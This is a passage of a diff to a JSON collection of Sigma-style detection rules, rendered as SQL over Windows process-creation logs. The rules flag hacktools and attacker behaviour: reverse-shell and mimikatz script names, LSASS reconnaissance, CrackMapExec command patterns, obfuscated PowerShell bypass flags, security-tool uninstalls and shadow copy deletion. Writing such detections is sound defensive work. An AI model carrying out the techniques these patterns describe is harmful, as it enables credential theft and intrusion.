view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE 